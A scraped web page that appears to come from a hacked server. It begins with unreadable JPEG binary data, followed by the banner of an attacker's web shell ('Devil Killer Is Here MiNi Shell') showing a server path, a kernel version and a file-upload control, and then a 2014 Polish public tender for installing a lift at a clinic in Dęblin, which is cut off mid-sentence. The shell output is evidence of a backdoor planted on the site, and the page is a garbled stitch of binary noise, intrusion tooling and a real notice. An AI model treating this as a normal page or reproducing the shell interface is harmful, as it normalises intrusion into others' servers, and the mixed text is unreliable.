JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140121/23162-N-2014.html

<p class="kh_header"><b>Dęblin: Zakup, dostawa i montaż windy w budynku Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Dęblinie.</b><br>
<b>Numer ogłoszenia: 23162 - 2014; data zamieszczenia: 21.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Dęblinie , Ul. Rynek 14, 08-530 Dęblin, woj. lubelskie, tel. 81 8831332, faks 81 8831332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozdeblin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa i montaż windy w budynku Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Dęblinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa nadana zamówieniu  przez Zamawiającego:Zakup, dostawa i montaż  windy w budynku Samodzielnego  Publicznego Zakładu Opieki Zdrowotnej w Dęblinie. Przedmiot zamówienia zgodnie ze Wspólnym Słownikiem Zamówień KOD CPV..
45310000-3  -Roboty instalacyjne elektryczne,45453000-7  -Roboty remontowe i renowacyjne,45313100-5  - Instalowanie wind, 45215100-8 - Roboty budowlane w zakresie budowy placówek zdrowotnych.Opis przedmiotu zamówienia:  
Opis przedmiotu zamówienia zawiera dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót budowlanych - dobudowa szybu windowego do budynku przychodni SPZOZ ul. Rynek 14, 08-530 Dęblin. Szczegółowy zakres przedmiotu zamówienia obejmuje zakup, dostawę i montaż windy w budynku Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Dęblinie. Wykonanie zgodnie z Projektem budowlanym Dobudowa szybu windowego do istniejącego budynku przychodni SPZOZ w Dęblinie,Specyfikacją Techniczną Wykonania i odbioru robót budowlanych Dobudowa szybu windowego do budynku przychodni SPZOZ ul. Rynek 14,08-530 Dęblin, SIWZ, Umową.  Parametry techniczne jakie winny być uwzględnione, zawarte w Projekcie budowlanym:Winda osobowa o napędzie elektrycznym, bez  maszynowni zamontowana w projektowanym szybie żelbetowym, obsługująca 3 kondygnacje budynku oraz dostępna  od zewnątrz bezpośrednio z poziomu przyległego terenu.Wyposażenie windy: wentylacja w kabinie, gong, zjazd ppoż., awaryjny zjazd po zaniku napięcia do najbliższego przystanku, 2-godz. Oświetlenie awaryjne, awaryjna łączność  z telefonem alarmowym, interkom z kabiny do sterowni, alarm, sygnalizacja przeciążenia.Wnętrze kabiny winno być łatwe do utrzymania w im czystości. Ściany i sufit o powierzchni gładkiej i łatwo zmywalnej. Podłoga o powierzchni antypoślizgowej, łatwozmywalnej.
- Drzwi windy wykonane ze stali  nierdzewnej  szczotkowanej  pełne, przesuwne teleskopowo, dwupanelowe o szerokości min. 90 cm. W świetle po otwarciu umożliwiające wjazd na wózku inwalidzkim.Parametry windy:Udźwig - 630 kg ( 8 osób)Wymiary wewnętrzne kabiny:110 cm ( szerokość) x 140 cm ( głębokość) x 220 cm ( wysokość) Prędkość - 1,0 m/s Ilość przystanków - 4 Temperatura pracy dźwigu - min. +5°C do max. + 40°C Wysokość podnoszenia - 619 cm Wysokość nadszybia - 356 cm ( od posadzki ostatniej kondygnacji na gotowo do haka montażowego) Wysokość minimalna podszybia- 125 cm. Wymiary drzwi w świetle : szerokość - 90 cm x wysokość - 200 cm. Parametry szybu windowego ( wg projektu ):Wymiary wewnętrzne na gotowo: 175 cm ( szerokość) x 195 ( głębokość)Grubość konstrukcyjna ścian : 24 cm. Wymiary otworów na drzwi :wysokość - 228 cm, ( wszystkie otwory),szerokość - 120 cm ( poziom terenu, piwnica, parter),szerokość - 154 cm ( piętro).Do podszybia należy wykonać drabinkę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 12.04.2002r. Drabinka z prętów stalowych kotwionych do ściany szybu we wnęce o wymiarach 10 cm ( głębokość) x 70 cm ( szerokość) x 250 cm ( wysokość) rozmieszczonych w pionie co 30 cm licząc od posadzki podszybia zgodnie z projektem. Dostępność dla osób niepełnosprawnych.Dobudowa szybu windowego uwzględnia potrzeby osób niepełnosprawnych poruszających się na wózkach inwalidzkich.
Rozwiązania: dostępność windy z poziomu terenu umożliwia utwardzony kostką brukową chodnik;wszystkie drzwi windy mają wymaganą szerokość minimalną w świetle po ich otwarciu wynoszącą 90 cm;wymiary kabiny umożliwiają wjazd i wyjazd wózkiem inwalidzkim.Montaż winien być wykonany przez wykwalifikowanych  montażystów i zgodnie z wytycznymi producenta. Wykonanie szybu zgodnie z wytycznymi sporządzonymi przez producenta wind.W ramach realizacji przedmiotu zamówienia wykonawca wykona, w szczególności:Dobudowę szybu windowego,
Roboty rozbiórkowe,Roboty ziemne,Roboty betonowe,Roboty murowe,Roboty ślusarskie,Roboty ciesielskie,Roboty pokrywcze i obróbki blacharskie,Roboty tynkarskie,Instalowanie windy,Roboty elektryczne,Instalowanie stolarki.Na przedmiot zamówienia składa się także:wykonanie dokumentacji rejestracyjnej wymaganej przez Urząd Dozoru Technicznego, przygotowanie urządzenia- windy-do odbioru technicznego oraz  udział w odbiorze,przeszkolenie 3 osób wyznaczonych przez zamawiającego w zakresie zapewniającym właściwą obsługę urządzenia.
Winda musi spełniać wymagania , o których mowa w rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 8 grudnia 2005r. w sprawie          zasadniczych wymagań dla dźwigów i ich elementów bezpieczeństwa (Dz.U. Nr 263,poz.2198 ze zm.).Winda musi mieć umieszczone oznakowanie CE .Odbiór windy musi być dokonany przez Urząd Dozoru Technicznego zgodnie z ustawą  z dnia 21 grudnia 2000r. o dozorze technicznym (Dz.U.Nr 122,poz.1321 ze zm.) oraz rozporządzeniem Rady Ministrów z dnia 16 lipca 2002r.  w sprawie rodzajów urządzeń technicznych podlegających dozorowi technicznemu (Dz.U. Nr       120,poz.1021 ze zm). Opisanie przedmiotu zamówienia w rozumieniu przepisu art. 29 ust. 3 i art. 30 ust.1-3 ustawy.Wszędzie tam gdzie opisano przedmiot zamówienia (jeżeli ma to miejsce) przez wskazanie określeń , o których mowa w art. 29 ust.3 i art.30 ust1-3 ustawy wskazaniu takiemu towarzyszą wyrazy lub równoważny, równoważne opisywanym. Przez materiały i urządzenia równoważne rozumie się materiały i urządzenia o parametrach technicznych równych lub lepszych niż określone w siwz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.31.00-5, 45.21.51.00-8, 45.45.30.00-7, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda od Wykonawców wniesienia wadium. Wartość wadium została ustalona na kwotę  zł. 3 500,00(trzy tysiące pięćset). Wadium wnosi się  przed upływem terminu składania ofert. Wadium może być  wnoszone w jednej lub kilku formach: pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt 2 ustawy z dnia 9 lipca 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42,poz.275, z 2008r. Nr 116,poz.730 i 732 i Nr 227,poz.1505 oraz z 2010r. Nr 96,poz.620).Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego NR: 7512 4028 5811 1100 10 1767 3966 Tytuł wpłaty: Wadium w przetargu na Windę. Za datę i godzinę wniesienia wadium w pieniądzu przyjmuje się datę i godzinę wpływu wadium na wskazany w pkt. 4 rachunek bankowy. Uznanie konta Zamawiającego winno nastąpić najpóźniej  do dnia 6 lutego 2014r.  do godz. 12.00.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Wadium wnoszone w formach, o których mowa w pkt. 3ppkt 2, 3, 4 i 5 musi 
wskazywać  przedmiot zamówienia i zabezpieczać złożoną ofertę przez cały okres, 
na jaki Wykonawca jest związany ofertą. Dokument taki musi zawierać nieodwołalne i bezwarunkowe  zobowiązanie poręczyciela lub gwaranta wypłacenia zawiającemu, na pierwsze jego żądanie, kwoty wadium , w przypadkach, o których mowa w  pkt. 13 i 14.Dokument ten w oryginale może być dołączony do oferty lub może być złożony w oddzielnej kopercie , zawierającej dane Wykonawcy i napis -Wadium w przetargu  na Windę -w  siedzibie Zamawiającego - Sekretariat przed upływem terminu składania ofert, tj. najpóźniej do dnia 6 lutego 2014r.  do godz. 12.00. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze.          Oferty najkorzystniejszej  lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 13 i 14. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę  przed upływem terminu składnia ofert. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę , któremu  
zwrócono wadium na podstawie pkt. 8, jeżeli  w wyniku rozstrzygnięcia odwołania 
jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium, w 
terminie określonym przez Zamawiającego.
Wadium wniesione w pieniądzu ,Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
za przelew pieniędzy  na rachunek bankowy wskazany przez Wykonawcę.
 Zamawiający zatrzymuje wadium  wraz z odsetkami, jeżeli Wykonawca:
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył
dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy, lub
pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po 
 jego stronie.Zamawiający zatrzymuje wadium  wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:odmówił  podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa sposobu dokonania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony ,jeżeli  Wykonawca wykaże ,że w okresie  ostatnich pięciu lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej: roboty budowlane  w zakresie jak przedmiot zamówienia o wartości co najmniej 200 000,00zł.(dwieście  tysięcy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa sposobu dokonania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony ,jeżeli Wykonawca wykaże ,że w wykonywaniu zamówienia będzie uczestniczyć:co najmniej 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej; lub równoważnymi (jeżeli dotyczy);co najmniej 1 osobę  posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności elektrycznej  lub równoważnymi (jeżeli dotyczy) albo co najmniej jedna osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub równoważnymi (jeżeli dotyczy) i posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności  elektrycznej lub równoważnymi (jeżeli dotyczy) .  Za  ważne uznaje się uprawnienia uzyskane zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane ( tekst jednolity Dz.U z 2010r. nr 243,poz.1623) , a także  uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia  o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym - wydane  przez te państwa ,na podstawie art.1 ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej(Dz.U.Nr 63,poz.384) i art. 20a ust.1 ustawy z dnia 15  grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów(Dz.U.Nr 5,poz.42 ze zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony ,jeżeli Wykonawca: posiada środki finansowe lub zdolność kredytową: w  kwocie  co najmniej 200 000,00zł. (dwieście tysięcy);                 jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i suma gwarancyjna wynosi co najmniej: 200 000,00zł. (dwieście  tysięcy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Deklaracja zgodności WE, o której mowa w § 27 i 30 rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 8 grudnia 2005r. w sprawie zasadniczych wymagań dla dźwigów i ich elementów bezpieczeństwa. ( Dz. U. nr 263, poz. 2198 ze zm.)</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany  postanowień umowy  w zakresie:1.terminu wykonania przedmiotu umowy i pozostałych terminów określonych w umowie; 1) poprzez przedłużenie w sytuacji : a) gdy wystąpią okoliczności ,  których nie można było przewidzieć , a które mają istotny  wpływ na terminową realizację umowy, b) na żądanie zamawiającego zajdzie konieczność dokonania zmian w dokumentacji projektowej skutkująca konieczny dłuższy termin do wykonania przedmiotu zamówienia;c) działania siły wyższej uniemożliwiającej realizację przedmiotu umowy. W przypadku zaistnienia przesłanek do przedłużenia terminu, określonych w pkt 1, termin zostanie przedłużony o czas niezbędny do 
wykonania przedmiotu umowy , jednakże nie dłuższy niż okres trwania tych przesłanek. 2)poprzez skrócenie:w sytuacji gdy zostaną spełnione łącznie dwie przesłanki:a)  Wykonawca wcześniej niż się  Strony umówiły w Umowie
